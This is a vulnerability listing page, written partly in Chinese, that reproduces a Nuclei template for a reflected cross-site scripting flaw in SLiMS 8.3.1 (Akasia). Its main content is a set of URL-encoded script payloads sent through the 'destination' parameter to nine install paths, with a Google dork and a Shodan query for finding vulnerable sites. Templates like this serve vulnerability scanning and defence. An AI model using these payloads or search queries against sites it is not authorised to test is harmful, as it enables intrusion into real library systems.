slims-8-akasia-xss: Senayan Library Management System v8.3.1 (Akasia) - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: slims 8 akasia | POC: 已公开

漏洞描述

SLiMS 8.3.1 (Akasia) has a `destination` parameter that is vulnerable to reflected XSS. However, ensure that the `p` parameter points to the 'member'. Additional google dork 'intext:"SLiMS 8.3.1 (Akasia)"'.

PoC代码[已公开]

id: slims-8-akasia-xss

info:
  name: Senayan Library Management System v8.3.1 (Akasia) - Cross-Site Scripting
  author: nblirwn
  severity: medium
  description: |
    SLiMS 8.3.1 (Akasia) has a `destination` parameter that is vulnerable to reflected XSS. However, ensure that the `p` parameter points to the 'member'. Additional google dork 'intext:"SLiMS 8.3.1 (Akasia)"'.
  reference:
    - https://github.com/slims/slims8_akasia/issues/184
  metadata:
    verified: true
    max-request: 1
    vendor: slims
    product: senayan_library_management_system
    shodan-query: html:"SLIMS"
  tags: senayan,xss,slims,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member"
      - "{{BaseURL}}/perpustakaan/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member"
      - "{{BaseURL}}/slims/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member"
      - "{{BaseURL}}/perpustakaan/slims/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member"
      - "{{BaseURL}}/e-library/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member"
      - "{{BaseURL}}/perpus/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member"
      - "{{BaseURL}}/digilib/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member"
      - "{{BaseURL}}/akasia/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member"
      - "{{BaseURL}}/library/index.php?destination=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&p=member"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<script>alert(document.domain)</script>'
          - 'SLiMS'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a24867d70cfb7e8649d2a808abdaa49a0337c716227b232fe6d52ae6dfce3020022075bd49c1c8e9f28896ce4344b49274e9787bb595a4762899a08a55d267131426:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/slims-8-akasia-xss.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐